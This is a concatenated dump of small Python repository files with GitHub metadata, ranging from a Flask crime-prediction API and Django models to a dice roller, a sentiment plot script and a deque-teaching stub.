prediction = model.predict(df)
prediction = model_scalers['y'].inverse_transform(prediction)
else:
df = model_scalers['x'].transform(df)
prediction = model.predict(df)
prediction = model_scalers['y'].inverse_transform(prediction.reshape(-1,1))
print(len(prediction))
for i in range(len(prediction)):
if model_type == 'keras':
results[i]['pred'] = int(max(np.round(float(prediction[i][0])-0.39+0.5),0))
else:
results[i]['pred'] = int(max(np.round(float(prediction[i])-0.39+0.5),0))
return {'result':results}
class predictionAndKPIs(Resource):
# Get predictors
def get(self):
global model
global model_features
global model_type
global model_name
if (model is None):
return {'message':'Model is not loaded','result':'failed'}
return {'model_name':model_name,'model_type':model_type,'input_features':model_features,'result':'success'}
# Run the predictions
def post(self):
global model
global model_features
global graph
global model_type
global model_scalers
global model_info
predictParser = reqparse.RequestParser()
predictParser.add_argument('communityarea')
predictParser.add_argument('weekday')
predictParser.add_argument('weekyear')
predictParser.add_argument('hourday')
if (model is None):
return {'message':'Model is not loaded','result':'failed'}
args = predictParser.parse_args()
for arg in args:
if args[arg] is None:
if (arg == 'communityarea'):
args[arg] = [i for i in range(1,78)]
else:
return {'message':'Missing input '+arg,'result':'failed'}
else:
args[arg] = json.loads(args[arg])
df = pd.DataFrame()
crime_types = [x for x in model_features if x.startswith('primaryType_')]
results = []
for ca,wy,wd,hd,ct in itertools.product(args['communityarea'],args['weekyear'],args['weekday'],args['hourday'],crime_types):
line = {'Community Area':str(ca),'Week of the Year':str(wy),'Day of the Week':str(wd),
'Period of the Day':str(hd),'Crime Type':ct.replace('primaryType_','')}
df = df.append(line, ignore_index=True)
results.append({'communityArea':str(ca),'weekYear':wy,'weekDay':wd,'hourDay':hd,'primaryType':ct.replace('primaryType_',''),'pred':None})
df = pd.merge(df, features_data, on='Community Area')
for feat in available_features:
if feat['onehot-encoded']:
df = pd.concat([df,pd.get_dummies(df[feat['feature']], prefix=feat['column'])],axis=1)
df.drop(columns=[feat['feature']], inplace=True)
for feat in model_features:
if feat not in df:
df[feat] = 0
df.fillna(0,inplace=True)
df = df.filter(items=model_features,axis=1)
if (model_type == 'keras'):
df = model_scalers['x'].transform(df)
with graph.as_default():
prediction = model.predict(df)
prediction = model_scalers['y'].inverse_transform(prediction)
else:
df = model_scalers['x'].transform(df)
prediction = model.predict(df)
prediction = model_scalers['y'].inverse_transform(prediction.reshape(-1,1))
for i in range(len(prediction)):
if model_type == 'keras':
results[i]['pred'] = int(max(np.round(float(prediction[i][0])-0.39+0.5),0))
else:
results[i]['pred'] = int(max(np.round(float(prediction[i][0])-0.39+0.5),0))
# Consolidate into map format and calculate KPIs
crimeByCommunity = defaultdict(int)
crimeByType = defaultdict(int)
communities = {}
predictionFairness = 0
for comm in db.session.query(Community):
communities[comm.code] = {'id':comm.id,'code':comm.code,'name':comm.name,'ethnicity':comm.ethnicity}
for result in results:
if (result['communityArea'] is not None) and (result['primaryType'] is not None) and (result['communityArea'] != '0') and (result['primaryType'] != ''):
crimeByCommunity[result['communityArea']] += result['pred']
crimeByType[result['primaryType']] += result['pred']
predictionFairness = calculateFairness(communities,crimeByCommunity)
return {'crimeByCommunity':crimeByCommunity, 'crimeByType':crimeByType, 'fairness': predictionFairness, 'predictions':results, 'result':'success'}
class reloadModel(Resource):
def get(self):
# Reload the model
global model
global model_name
global model_features
global graph
global model_type
global model_scalers
global model_info
global features_data
global available_features
loadParser = reqparse.RequestParser()
loadParser.add_argument('modelname')
args = loadParser.parse_args()
if args['modelname'] is None:
return {'message':'Missing modelname argument.','result':'failed'}
try:
model,model_name,model_features,graph,model_type,model_scalers,model_info = load_model(json.loads(args['modelname']))
features_file = 's3://w210policedata/datasets/AvailableFeatures.pickle'
s3 = s3fs.S3FileSystem(anon=False)
with s3.open(features_file, "rb") as json_file:
available_features = pickle.load(json_file)
json_file.close()
#features_file = 's3://w210policedata/datasets/AdditionalFeatures.parquet'
#features_data = pd.read_parquet(features_file)
features_file = 's3://w210policedata/datasets/AdditionalFeatures.csv'
features_data = pd.read_csv(features_file)
features_data['Community Area'] = features_data['Community Area'].map(str)
return{'message':'Model loaded succesfully.','error':None,'result': 'success'}
except Exception as e:
return{'message':'Model load failed.','error':str(e),'result': 'failed'}
class getAvailableModels(Resource):
def get(self):
# Look into S3 Models folder for trained models
models = []
try:
s3 = s3fs.S3FileSystem(anon=False)
items = s3.ls('w210policedata/models',detail=True)
for item in items:
if item['StorageClass'] == 'DIRECTORY':
modelinfo_file = item['Key']+'/modelinfo.pickle'
with s3.open(modelinfo_file, "rb") as pickle_file:
model_info = pickle.load(pickle_file)
pickle_file.close()
models.append(model_info)
except Exception as e:
return{'message':'Failure reading model data from S3.','error':str(e),'result':'failed'}
return {'models':models,'result':'success'}
class getAvailableFeatures(Resource):
def get(self):
global available_features
global features_data
try:
#file = './data/OneHotEncodedDataset.parquet' # This line to read from local disk
features_file = 's3://w210policedata/datasets/AvailableFeatures.pickle' # This line to read from S3
#training_data = pd.read_csv(file,sep=',', error_bad_lines=False, dtype='unicode')
s3 = s3fs.S3FileSystem(anon=False)
with s3.open(features_file, "rb") as json_file:
available_features = pickle.load(json_file)
json_file.close()
#features_file = 's3://w210policedata/datasets/AdditionalFeatures.parquet'
#features_data = pd.read_parquet(features_file)
features_file = 's3://w210policedata/datasets/AdditionalFeatures.csv'
features_data = pd.read_csv(features_file)
features_data['Community Area'] = features_data['Community Area'].map(str)
except Exception as e:
return{'message':'Failure reading available features data from S3.','error':str(e),'result':'failed'}
return {'features':available_features,'result':'success'}
api.add_resource(checkService, '/')
api.add_resource(trainModel, '/trainModel')
api.add_resource(getTrainingStatus, '/getTrainingStatus')
api.add_resource(killTrainer, '/killTrainer')
api.add_resource(predict, '/predict')
api.add_resource(predictionAndKPIs, '/predictionAndKPIs')
api.add_resource(reloadModel, '/reloadModel')
api.add_resource(getAvailableModels, '/getAvailableModels')
api.add_resource(getAvailableFeatures, '/getAvailableFeatures')
if __name__ == '__main__':
application.run(debug=True, port=60000)
| [
"felipe.pqi@gmail.com"
] | felipe.pqi@gmail.com |
204aa6d13a66a0db1220d1ef9864c83c98c175d0 | efd6a277c2d5bffdfba6ccb4d5efd555e652d29e | /chap7/7.7.py | 7c207a1ed18a1835e5860abdacf3a292352aca05 | [] | no_license | CavalcanteLucas/cookbook | dd57583c8b5271879bb086783c12795d1c0a7ee8 | 09ac71e291571e3add8d23d79b1684b356702a40 | refs/heads/master | 2020-03-25T03:09:39.608599 | 2019-09-13T04:43:23 | 2019-09-13T04:43:23 | 143,325,952 | 0 | 0 | null | 2020-09-25T05:46:30 | 2018-08-02T17:32:08 | Python | UTF-8 | Python | false | false | 45 | py | # Capturing Variable in Anonymous Functions
| [
"thesupervisar@gmail.com"
] | thesupervisar@gmail.com |
b1bca0d09d203d8208286ee334ddf76ec807a68e | c0d5fc26ba84365aae197541d946d79fa4eb8dae | /mechanics.py | a7adc77a82d6ec8aff8b46bf20a48456bb2849d2 | [] | no_license | Amperthorpe/PythonTextGame | 45ef7a21eba536afd4d2d9a0f6d6c62b520833ef | 9178257133821f03526c29252aec801732caca8d | refs/heads/master | 2021-09-24T02:59:16.975687 | 2018-10-02T06:15:15 | 2018-10-02T06:15:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | from __future__ import annotations
import random
def roll_dice(count, dice, full=False):
rolls = [random.randint(1, dice) for _ in range(count)]
if full:
return sum(rolls), rolls
else:
return sum(rolls)
class DiceRoller:
"""For persistent values for dice rolls"""
def __init__(self, count, dice):
self.count = count
self.dice = dice
def __call__(self, *args, **kwargs):
return roll_dice(self.count, self.dice, full=kwargs.get('full', False))
def _test():
dice5d20 = DiceRoller(5, 20)
print(dice5d20())
print(dice5d20())
print(dice5d20())
print(dice5d20())
if __name__ == '__main__':
_test()
| [
"alleluid@users.noreply.github.com"
] | alleluid@users.noreply.github.com |
4787afa1f34e43341bfb363697036945bc1f6b5a | bf4b4e3e0ee17633800e206f2a1b899de81d2284 | /www/cgi-bin/backup/twitter/graph.py | 9f7a47813485c83c6c1930c27361312747a6c2b3 | [] | no_license | gurdasanivishal/hadoop_Automation_via_Dockers | 5e9fcbb79185096f173deddcb794c8a1c20bff25 | 8badba4ebda2ce563e2e3593a32b8b919ed87acc | refs/heads/master | 2020-06-02T08:40:08.730203 | 2019-11-21T06:28:15 | 2019-11-21T06:28:15 | 191,103,089 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 942 | py | #!/usr/bin/python
import matplotlib.pyplot as plt
import csv
import commands
# cutting file pnum
commands.getoutput("sudo cat ttt.txt | awk -F'(' '{print $2}' | cut -d, -f1 | cut -d= -f2 >pnum.txt")
commands.getoutput("sudo cat ttt.txt | awk -F'(' '{print $2}' | cut -d, -f2 | cut -d= -f2 | cut -d')' -f1 >snum.txt")
x = []
y = []
f=open('pnum.txt')
for i in f:
j=i.split()[0]
x.append(j)
print x
f.close()
f=open('snum.txt')
for i in f:
j=i.split()[0]
y.append(j)
print y
f.close()
'''
with open('tweet.csv','r') as csvfile:
plots = csv.reader(csvfile, delimiter=',')
for row in plots:
x.append(row[0])
y.append(row[1])
'''
plt.plot(x,y)
plt.plot(y,x)
plt.scatter(x,y, label='polarity/sensitivity',s=100,c='r')
plt.scatter(y,x, label='sensitivity/polarity',s=150,c='g',marker='*')
plt.xlabel('polarity')
plt.ylabel('sensitivity')
plt.title('SEntiment graphs')
plt.legend()
plt.show()
| [
"vishal.gurdasani@elogist.in"
] | vishal.gurdasani@elogist.in |
466bd43facef0ff807850dc4caf2a5d061758411 | 72af42076bac692f9a42e0a914913e031738cc55 | /01, 특강_210705_0706/02, source/CookData(2021.01.15)/Code03-02.py | 77bba4c75ad3200137cbc7e4f6f9c010afb45baa | [] | no_license | goareum93/Algorithm | f0ab0ee7926f89802d851c2a80f98cba08116f6c | ec68f2526b1ea2904891b929a7bbc74139a6402e | refs/heads/master | 2023-07-01T07:17:16.987779 | 2021-08-05T14:52:51 | 2021-08-05T14:52:51 | 376,908,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 536 | py | katok = ["다현", "정연", "쯔위", "사나", "지효"]
def insert_data(position, friend) :
if position < 0 or position > len(katok) :
print("데이터를 삽입할 범위를 벗어났습니다.")
return
katok.append(None) # 빈칸 추가
kLen = len(katok) # 배열의 현재 크기
for i in range(kLen-1, position, -1) :
katok[i] = katok[i-1]
katok[i-1] = None
katok[position] = friend # 지정한 위치에 친구 추가
insert_data(2, '솔라')
print(katok)
insert_data(6, '문별')
print(katok)
| [
"goareum7@gmail.com"
] | goareum7@gmail.com |
911c2d2d63014735f36b0af77064c085eab848fe | bb5f310f342cf1a92bb11d02701ceda9a20d00b7 | /article/migrations/0001_initial.py | 3fcabbb6fca931534f4b3a529fadb579d7c5ca08 | [] | no_license | agecspnt/djangoProject | f340ad3e437537bdf928e2e77e5d218e7f58d1da | bb4200e35c91c39b87f96988648e3b95b95041d9 | refs/heads/master | 2023-07-13T22:39:48.022470 | 2021-08-22T04:07:01 | 2021-08-22T04:07:01 | 398,515,520 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,056 | py | # Generated by Django 3.2.6 on 2021-08-15 04:42
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='ArticlePost',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('body', models.TextField()),
('created', models.DateTimeField(default=django.utils.timezone.now)),
('updated', models.DateTimeField(auto_now=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('-created',),
},
),
]
| [
"agecspnt@gmail.com"
] | agecspnt@gmail.com |
aada5ea54cf6f63628a5f4658d0f197fdaa086f1 | 10ed6af8759eb1d9875b98cba8612a0134afa563 | /project_1/shortenersite/urls.py | ee9a9a26add4d08c629c7f14361662fc7807e019 | [] | no_license | SanGlebovskii/UrlShortener | bc321482e1266fea5358102c4aad23c94fb3e903 | fb726987a67b63fe1270b90c6a46ff76c5e2e473 | refs/heads/master | 2023-08-26T21:12:57.102118 | 2021-10-19T16:31:24 | 2021-10-19T16:31:24 | 419,461,813 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | from django.contrib import admin
from django.urls import path
from .views import *
| [
"bychkokatya@gmail.com"
] | bychkokatya@gmail.com |
e8a73dea3080e6faa22a2f991da6b5bf4747d68b | a5a1230d8ae51b6b52b11333fd9fe8458eb7fe91 | /phaseTest/user.py | d11d4848ffa9c9931d883bf016a18722315af349 | [] | no_license | TTTTTong/Python_Blog_Demo | a8fef07718f255809603d64d952815f3fbb4c6a0 | 8e4bf43d3d8bd3d2af881fa433798cb4823bfbd2 | refs/heads/master | 2021-07-23T07:43:06.186538 | 2017-10-31T15:50:58 | 2017-10-31T15:50:58 | 106,183,113 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 187 | py | # -*- coding: utf-8 -*-
from www.orm import Model, StringField, IntegerField
class User(Model):
__table__ = 'users'
id = IntegerField(primary_Key=True)
name = StringField() | [
"t15529208705@gmail.com"
] | t15529208705@gmail.com |
6e7271c8a1eb8bc295f3ece232488fbacef01969 | a5483feae3a201d116629fa2e55a03e51bbe7478 | /signin/models.py | 93e2908a1739b155b10bc3d83355a69c00633c84 | [] | no_license | basavaraj4321/WantBook_3 | 8f6f3e2b3e6e7166bc37b2947ac8aeda2368b46e | 3ea402e6f0cbf9d99307114fe557247c74b9b5a4 | refs/heads/master | 2020-03-15T01:10:22.931127 | 2018-05-02T17:57:22 | 2018-05-02T17:57:22 | 131,887,051 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 618 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
# Create your models here.
class BookUser(models.Model):
user1 = models.OneToOneField(User)
email_id = models.EmailField(max_length = 50)
phone_number = models.IntegerField(default = 0)
address = models.TextField(max_length=100)
def create_profile(sender, **kwargs):
if kwargs['created']:
user_profile = BookUser.objects.create(user = kwargs['instance'])
post_save.connect(create_profile, sender=User)
| [
"basu@Basavarajs-MacBook-Air.local"
] | basu@Basavarajs-MacBook-Air.local |
e6c38b138e63c75a95de70360b78e6deecaa3870 | a2f208c5cc0c941eec7a7d1307817ec7918f779d | /python_scripts/01.py | 5db3f7067dd90934628fdaa5b0cc63d29ff72c42 | [] | no_license | Asteriskers/NoteBook_Home_HP | fd3c98d9651981ba8faea786ba4ce3fac48b31a2 | bdb52dfcf7f9a216df4e548188602241744a0389 | refs/heads/master | 2020-07-25T05:09:35.082484 | 2019-09-14T02:52:19 | 2019-09-14T02:52:19 | 208,175,513 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 40 | py | #/bin/python
#
var = "tesst"
print(var)
| [
"notebook_home_hp@163.com"
] | notebook_home_hp@163.com |
ea92e1cf286bc36f8468711bae7e14fbe169fd0b | 1ae0d8eb0cd5db0bd886b40912b910bbba908b70 | /swapnum.py | 7937865bc026c1d10ca5fff85ec2802ec275047e | [] | no_license | keerthanachinna/beginnerset3 | fae07713eac49f121e103b118e495019bf4102af | 1cc4fe785d35035a184f128865019acb17ccf4e5 | refs/heads/master | 2020-03-21T09:55:59.035254 | 2018-08-08T15:56:26 | 2018-08-08T15:56:26 | 138,424,981 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | py | def main():
printf("enter the numbers")
n1=int(raw_input(enter the n1:))
n2=int(raw_input(enter the n2:))
print(n1)
print(n2)
if((n1<100000)&&(n2<100000)):
t=n1
n1=n2
n2=t
printf("after swappping the numbers are %d,%d",n1,n2)
else
printf("number with in only 100000");
| [
"noreply@github.com"
] | noreply@github.com |
0faba6d5b256068f61ae56a45c5afb98e6ce9c93 | 13bf5b764ee3b7b425991d03062490e6f28def6f | /accounts/urls.py | 3ab45a5961ab3bbf549dafde96ef53d2c9bf5a6c | [] | no_license | joseChQ/sof2 | 806b0197ef95c0a67bc27fb4e56342b2a9f172a2 | 4c92581ad6b73bc4acf4392c3835dae66283fca0 | refs/heads/master | 2022-12-14T12:21:50.402638 | 2020-09-10T13:21:29 | 2020-09-10T13:21:29 | 294,418,844 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | # acounts/urls.py
from django.urls import path
from . import views
urlpatterns = [
path('signup/', views.SignUpView.as_view(), name='signup'),
] | [
"63762044+joseChQ@users.noreply.github.com"
] | 63762044+joseChQ@users.noreply.github.com |
6757df9b87934f4ad429c3afdd0a94ab1d0c296d | 721ad225fad30f599cc79bbb0c76a38c07214d7a | /K Fold Cross-Validated Neural Network with 2 Hidden Layers.py | 68cd015efde17150031b85e456b454d4dd0bd297 | [] | no_license | karimcarroum9/Master-of-Research-Data-Science-and-eSports | 91ec1202e5526edb451065e5c1c012799ab9155f | e6bf0847a7a6d051f78b033a1326b552cdce5c47 | refs/heads/master | 2022-04-18T22:15:10.988764 | 2020-04-17T22:38:07 | 2020-04-17T22:38:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,205 | py | ### Neural Network with Cross-Validation of Activation Functions and Hidden Units (Two Hidden Layers)
### Karim Carroum Sanz - karim.carroum01@estudiant.upf.edu
### Dataset of League of Legends Season 9 Professional e-Sports Players' Statistics
import pandas as pd
import numpy as np
import csv
import tensorflow as tf
from tensorflow import keras
from keras import losses, metrics
from keras.models import Sequential
from keras.layers import Dense
from sklearn.model_selection import KFold
from datetime import datetime
# Import dataset. Note: here I call it train, but later this dataset is splitted into train and test datasets.
train = pd.read_csv("sselected.csv") # Sample the train dataset to ensure "randomness"
train = train.iloc[:,1:(train.shape[1]+1)]
train_x = train.iloc[:,1:(train.shape[1]+1)]
train_y = train.iloc[:,0]
# Model creation function
def create_model(inputs, hu1, hu2, hu_last, actfun1, actfun2, actfun_last, optimizer, metric, loss):
model = Sequential()
model.add(Dense(hu1, input_dim=inputs, activation=actfun1))
model.add(Dense(hu2, activation=actfun2))
model.add(Dense(hu_last, activation=actfun_last))
model.compile(loss=loss, optimizer=optimizer, metrics=metric)
return model
# Cross-Validation by activation functions and hidden units
def cross_val(train_x, train_y, folds, epochs, batch_size, hu1, hu2, hu_last, actfun1, actfun2, actfun_last, optimizer, metric, loss):
#Statistics
folds_scores_out_of_sample = []
folds_scores_in_sample = []
model = create_model(inputs=inputs, hu1=hu1, hu2=hu2, hu_last=hu_last, actfun1=actfun1, actfun2=actfun2,
actfun_last=actfun_last, optimizer=optimizer, metric=metric, loss=loss)
for train_index, test_index in KFold(folds).split(train_x):
cv_train_x, cv_test_x = train_x.iloc[train_index], train_x.iloc[test_index]
cv_train_y, cv_test_y = train_y.iloc[train_index], train_y.iloc[test_index]
model.fit(cv_train_x, cv_train_y, epochs=epochs, batch_size=batch_size)
folds_scores_out_of_sample.append(model.evaluate(cv_test_x,cv_test_y))
folds_scores_in_sample.append(model.evaluate(cv_train_x,cv_train_y))
return np.mean(folds_scores_out_of_sample), np.mean(folds_scores_in_sample)
def neural_network_reg_cv(train_x, train_y, inputs, hu1, hu2, hu_last, actfun, metric, loss, optimizer, folds, epochs = 20, batch_size = 20,
multistarts = False, multistarts_info = False):
# Dictionary gathering info regarding the mae (out and in sample) corresponding to combinations of different activation functions and
# numbers of hidden units at each layer
summary = {}
key = 0 # Used also as a counter of iterations
# Some indicators of runtime
start_time = datetime.now()
iterations = hu1 * hu2 * hu_last * len(actfun) ** 3 * folds
print(iterations)
# With multistarts
if multistarts:
# If we want information for each multistart, not just the optimal models
if multistarts_info:
# Small loop
for hui in range(1, hu1 + 1):
for huj in range(1, hu2 + 1):
for huk in range(1, hu_last + 1):
for actfun1 in actfun:
for actfun2 in actfun:
for actfun_last in actfun:
summary_values = []
# Multistarts loop
for start in range(1, multistarts + 1):
current_best_mae_out_of_sample = 100000000000000000000000000 # Set arbitrarily high so first multistart's mae is always lower
# Cross-validation
stats = cross_val(train_x, train_y, folds, epochs, batch_size, hui, huj, huk, actfun1, actfun2,
actfun_last, optimizer, metric, loss)
# Selection of best multistart
if stats[0] >= current_best_mae_out_of_sample:
continue
else:
current_best_mae_out_of_sample = stats[0]
# Update of stats dictionary if model is better than current best
summary_values.append(stats[0])
summary_values.append(stats[1])
summary_values.append(hui)
summary_values.append(huj)
summary_values.append(huk)
summary_values.append(actfun1)
summary_values.append(actfun2)
summary_values.append(actfun_last)
summary[key] = summary_values
key = key + 1
print(key, iterations / folds)
# If we do not want information for each multistart, just the optimal models
else:
# Small loop
for hui in range(1, hu1 + 1):
for huj in range(1, hu2 + 1):
for huk in range(1, hu_last + 1):
for actfun1 in actfun:
for actfun2 in actfun:
for actfun_last in actfun:
summary_values = ["mae_out_of_sample", "mae_in_sample", "hu1", "hu2", "hu_last", "actfun1", "actfun2", "actfun_last"]
# Multistarts loop
for start in range(1, multistarts + 1):
current_best_mae_out_of_sample = 100000000000000000000000000 # Set arbitrarily high so first multistart's mae is always lower
# Cross-validation
stats = cross_val(train_x, train_y, folds, epochs, batch_size, hui, huj, huk, actfun1, actfun2,
actfun_last, optimizer, metric, loss)
# Selection of best multistart
if stats[0] >= current_best_mae_out_of_sample:
continue
else:
current_best_mae_out_of_sample = stats[0]
# Update of stats dictionary if model is better than current best
summary_values[0] = stats[0]
summary_values[1] = stats[1]
summary_values[2] = hui
summary_values[3] = huj
summary_values[4] = huk
summary_values[5] = actfun1
summary_values[6] = actfun2
summary_values[7] = actfun_last
summary[key] = summary_values
key = key + 1
print(key, iterations / folds)
# Without multistarts
else:
# Small loop
for hui in range(1, hu1 + 1):
for huj in range(1, hu2 + 1):
for huk in range(1, hu_last + 1):
for actfun1 in actfun:
for actfun2 in actfun:
for actfun_last in actfun:
summary_values = []
# Cross-validation
stats = cross_val(train_x, train_y, folds, epochs, batch_size, hui, huj, huk, actfun1, actfun2,
actfun_last, optimizer, metric, loss)
# Fill the summary dictionary
summary_values.append(stats[0])
summary_values.append(stats[1])
summary_values.append(hui)
summary_values.append(huj)
summary_values.append(huk)
summary_values.append(actfun1)
summary_values.append(actfun2)
summary_values.append(actfun_last)
summary[key] = summary_values
key = key + 1
print(key, iterations / folds)
#Export to csv in current directory
results = pd.DataFrame.from_dict(summary)
results.to_csv('results.csv') # Csv needs to be transposed
end_time = datetime.now()
total_time = end_time - start_time
return summary, total_time
# Model's hyperparameters // Model with 2 hidden layers, regression
actfun = ["sigmoid", "tanh", "linear"] # Activation functions
inputs = train.shape[1] - 1 # Number of training variables
hu1 = 12 # 1st hidden layer's maximum units
hu2 = 6 # 2nd hidden layer's maximum units
hu_last = 1 # Hidden units in output layer --> 1 for regression, more for classification
optimizer = "rmsprop" # "adam", "rmsprop", "nadam", "sgd", "adagrad", "adadelta" --> rmsprop faster, adam yields higher accuracy
metric = [metrics.mae] # Epoch's performance metric
loss = losses.mean_absolute_error # Loss function epoch's score
folds = 2 # Number of folds for the cross-validation
epochs = 20 # Starting weights close to linerity, so lower amount of epochs implies activation fcts closer to linearity
batch_size = 20 # Reduce it to reasonable levels to improve the generalisation of the models, but runtime increases multiplicatively
multistarts = 2 # Set to False, 0 or 1 if no multistarts are desired. Best multistart is choosen, not the average
multistarts_info = True # Set to true to output mae's out and in sample for each multistart, even if they are not the optimal for their corresponding iteration
# Can be used to calculate mae as an average of multistarts instead than as a min
# Results
cv_nn = neural_network_reg_cv(train_x=train_x, train_y=train_y, inputs=inputs, hu1=hu1, hu2=hu2, hu_last=hu_last, actfun=actfun, metric=metric,
loss=loss, optimizer=optimizer, folds=folds, epochs=epochs, batch_size=batch_size, multistarts=multistarts, multistarts_info=multistarts_info)
print("Running time: ", cv_nn[1])
| [
"noreply@github.com"
] | noreply@github.com |
67268010ff59ff1aae3d761a98739780226f70d5 | 82bf9b7dce20f045a02625b4d206a141ae63e99a | /PythonParticipant/core/transaction.py | cfe68c3315c10b57b70538d2edb3e2014e38a87e | [] | no_license | acidoth/Participants | 408a53dfa4c4b17045ca5d0928040666141faea2 | d7488a69c3411ee008f0c4767b5941d7f56d2790 | refs/heads/master | 2016-09-11T12:54:45.380017 | 2013-12-05T05:18:11 | 2013-12-05T05:18:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 883 | py | #!/usr/bin/python
import MySQLdb
class Transaction:
def __init__(self, transactionid, customername, fromdestination, todestination, date):
self.transactionId = transactionid
self.fromdestination = fromdestination
self.todestination = todestination
self.date = date
self.customername = customername
self.connection = None
def setConnection(self, host, username, password, dbname):
self.connection = MySQLdb.connect(host, username, password, dbname)
def getConnection(self):
return self.connection
def getTransactionId(self):
return self.transactionId
def getFromDesti(self):
return self.fromdestination
def getToDesti(self):
return self.todestination
def getDate(self):
return self.date
def getCustomerName(self):
return self.customername
| [
"mpirinthapan@gmail.com"
] | mpirinthapan@gmail.com |
f821ee1ff0b336f0de182dad015449661d02f140 | 935ee20c9eda46f352d0dc96537959b1a5bff0af | /venv/Scripts/django-admin.py | 8a110aeff30cff1af03bbc084aae1ba9862b5895 | [] | no_license | DASARIVAMSHI/basicdjango | 168dd509a38fc46f5ed403913223b1a0f7162185 | 19d630feb8603c2a34679a3a0329473a4bc4bbc2 | refs/heads/master | 2023-03-28T23:53:32.412412 | 2021-03-30T17:18:41 | 2021-03-30T17:18:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 713 | py | #!c:\users\d p naidu\pycharmprojects\08\03\15\03\model\venv\scripts\python.exe
# When the django-admin.py deprecation ends, remove this script.
import warnings
from django.core import management
try:
from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
raise ImportError(
'django-admin.py was deprecated in Django 3.1 and removed in Django '
'4.0. Please manually remove this script from your virtual environment '
'and use django-admin instead.'
)
if __name__ == "__main__":
warnings.warn(
'django-admin.py is deprecated in favor of django-admin.',
RemovedInDjango40Warning,
)
management.execute_from_command_line()
| [
"190330272@klh.edu.in"
] | 190330272@klh.edu.in |
a26442c63dd7331ef05ba4ecd0d0945d4b74a43b | 9750584fed8c5b89ff72c05db57023988be34b79 | /app/views.py | 6137fe5ff0a0f92deeb4e1b791a97a96ff78936c | [] | no_license | tariik/django-heroku-app | 14ecf786837309626f79ec396d740070099a917c | fa2b29ab71f55b8cc7f51d364ac1134ced21f779 | refs/heads/master | 2023-08-17T19:20:30.490487 | 2020-06-06T17:14:44 | 2020-06-06T17:14:44 | 268,361,877 | 0 | 0 | null | 2021-09-22T19:07:41 | 2020-05-31T20:49:50 | Python | UTF-8 | Python | false | false | 619 | py | from django.shortcuts import render
from django.http import HttpResponse
from pprint import pprint
from django.core import serializers
from .models import User
# Create your views here.
def home(request):
# return HttpResponse('Hello from Python!')
users = User.objects.all()
text = 'hello world'
return render(request, "home.html",
{
'users':users,
'text':text
}
)
def db(request):
greeting = Greeting()
greeting.save()
greetings = Greeting.objects.all()
return render(request, "db.html", {"greetings": greetings})
| [
"khalfaoui.t@hotmail.com"
] | khalfaoui.t@hotmail.com |
fe67b587acb41838b627af66ca34a11ad458a34e | 7aa4e4bfee6b0a265a4bcf1b7f81291f3299f43b | /Day17/quiz_brain.py | 144287abfa11e8d10c95fbeb19d7332d51e1fc84 | [] | no_license | fazer1929/100DaysOfCode_Python | 464b54e33fdda25f985a4a7fde327ceafc88fa93 | 313cd77ad7266b18fd2442548569cf96f330ce26 | refs/heads/main | 2023-05-05T01:59:48.936964 | 2021-05-30T14:34:57 | 2021-05-30T14:34:57 | 311,775,381 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 868 | py | class QuizBrain:
def __init__(self,qlist):
self.question_list = qlist
self.question_number = 0
self.score = 0
def nextQuestion(self):
self.question_number += 1
question = self.question_list[self.question_number]
ans = input(f"Q.{self.question_number}: {question.text} (True/False)? : ")
self.checkAnswer(ans)
def stillHasQuestion(self):
return self.question_number < len(self.question_list)
def checkAnswer(self,ans):
if(ans.lower() == self.question_list[self.question_number].ans.lower()):
print("You Got It Right!")
self.score += 1
else:
print("You Got It Wrong!!!")
print(f"The Correct Answer Was {self.question_list[self.question_number].ans}")
print(f"Your Current Score is {self.score}/{self.question_number}") | [
"abhishekagrawal8888@gmail.com"
] | abhishekagrawal8888@gmail.com |
e0061b8f859c7e53737179b193420ee642e22eb7 | d94f26bf6579a5040212b4b9b4680cd1f29afa5b | /DS3_BaseStructures/lesson4_doubleENdedQueue.py | c8c499940c2234f254c8f702c1fac0124a8b50bb | [] | no_license | z1015784643/dataStucatures | c8a9b37534392c361cc6ab8fdcf5b403d824933d | 98d2858263a22ce8ba708f053d86293d3ef1c1a3 | refs/heads/master | 2022-07-17T02:40:39.664487 | 2020-05-20T09:41:45 | 2020-05-20T09:41:45 | 261,633,190 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,327 | py | '''
栈:后进先出(顶部进顶部出)
队列:先进先出(队尾进,队首出)
双端队列:一系列元素的有序集合。其两端成为队首(front)和队尾(rear),元素在到达两端之前始终位于双端队列。
与队列不同的地方在于:双端队列对元素的添加和删除限制不那么严格,元素可以从两端插入,也可以从两端删除。
总结来说:双端队列拥有栈和队列各自拥有的所有功能
抽象数据类型(ADT)
Deque() 创建一个空双队列,无参数,返回值为Deque对象
addFront() 在队首插入一个元素,参数为待插入元素,无返回值
addRear(item) 在队尾移插入一个元素,参数为待插入元素,无返回值
removeFront() 在队首移出一个元素,无参数,返回该移出的元素,双端队列会被改变
removeRear() 在队尾移出一个元素,无参数,返回该移出的元素,双端队列会被改变
isEmpty() 判断双端队列是否为空,无参数,返回布尔值
size() 返回双端队列中数据项的个数,无参数,返回值为整型数值
'''
class Deque():
